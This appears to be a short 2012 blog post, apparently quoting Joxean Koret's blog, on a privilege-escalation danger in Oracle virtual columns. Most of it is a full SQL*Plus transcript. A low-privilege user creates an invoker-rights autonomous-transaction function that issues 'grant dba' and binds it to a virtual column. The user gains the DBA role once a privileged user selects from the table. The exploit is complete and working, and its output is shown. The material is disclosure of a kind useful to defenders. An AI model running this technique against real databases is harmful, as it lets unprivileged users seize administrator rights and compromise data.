SQL> create user joxean identified by joxean;
User created.
SQL> GRANT connect, resource TO joxean;
GRANT succeeded.
SQL> conn joxean/joxean
Connected.
SQL> CREATE OR REPLACE FUNCTION F1 (p_value IN VARCHAR2)
RETURN VARCHAR2 AUTHID CURRENT_USER deterministic
AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'grant dba to joxean';
RETURN '1';
END F1;
/
FUNCTION created.
SQL> CREATE TABLE t2(
col1 VARCHAR2(50),
col2 generated always AS (f1('asdf')) virtual);
TABLE created.
SQL> SELECT * FROM t2;
no rows selected
SQL> INSERT INTO t2 (col1) VALUES ( 'a' );
1 row created.
SQL> commit;
Commit complete.
SQL> SELECT * FROM t2;
SELECT * FROM t2
*
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "JOXEAN.F1", line 6
SQL> SELECT * FROM user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
JOXEAN CONNECT NO YES NO
JOXEAN RESOURCE NO YES NO
SQL> conn / AS sysdba
Connected.
SQL> SELECT * FROM joxean.t2;
COL1 COL2
----- -----
a 1
SQL> SELECT * FROM dba_role_privs WHERE grantee = 'JOXEAN';
GRANTEE GRANTED_ROLE ADM DEF
------------------------------ ------------------------------ --- ---
JOXEAN RESOURCE NO YES
JOXEAN DBA NO YES
JOXEAN CONNECT NO YES
From: Dangers of Oracle Virtual Columns
Tuesday, May 1, 2012
Dangers of Oracle Virtual Columns
From Joxean Koret's blog: What happens if someone creates a table column based on a "malicious" PL/SQL function? What happens when someone selects data from a table with a virtual column that executes a GRANT command? If the user executing the query is a normal user, the function will fail, however, if the user is privileged, the code will be executed and the DBA privilege will be granted to the user "JOXEAN", like in the following sample:
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment